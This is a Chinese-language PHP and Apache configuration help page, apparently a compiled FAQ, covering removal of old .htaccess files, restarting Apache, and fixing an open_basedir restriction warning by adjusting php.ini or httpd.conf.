在 PHP 3.0.x 版中,有些目錄可能會有 .htaccess 的檔案,使用 PHP 4.0.x 版的系統,必須將這個檔案拿掉,可以使用改名字的方式或者直接刪除。
--------------------------------------------------------------------------------
當一切設定好了之後,重新執行 Apache 伺服器。在 Apache 目錄下有 bin 或是 sbin 的目錄,其中會有 apachectl 的 shell 程式,輸入 apachectl restart 就可以重新啟動 Apache 伺服器了。趕快試看看 hello, world 程式吧!
--------------------------------------------------------------------------------
㈨ php出現這類怎麼解決
在打開錯誤時發現提示 Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(../license.php) is not within the allowed path(s): 錯誤了,下面一起來看此問題解決辦法
先來看配置文件
$cache = new Cache(43200,'D:/wwwroot/cache/tmp/anzhuo/');//參數1 秒,參數2內容
$page = intval(isset($_GET['page'])?$_GET['page']:1);
$key = 'anzhuo_data_4'.$page;
$values = $cache->display($key);
這個是生成緩存文件了,但是發現生成是提示
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(../license.php) is not within the allowed path(s):
問題是出現在了PHP.INI上面了
原因是php.ini里設置了
open_basedir=/var/web/w0895/:/tmp:/usr/lib/php
這里加上相關的目錄就可以了
解答:
其實open_basedir 這個是用來限制php的目錄訪問許可權什麼的,如果不在允許的范圍內,php就不能訪問。
這個 open_basedir 在 php.ini 里可以設定,也可以在 apache的httpd.conf 裡面設定
例如:
php_admin_value open_basedir "D:/wwwroot/cache/tmp/anzhuo/"
再比如:
php_admin_value open_basedir =/var/web/w0895/:/tmp:/usr/lib/php
好了再重啟apache問題解決了。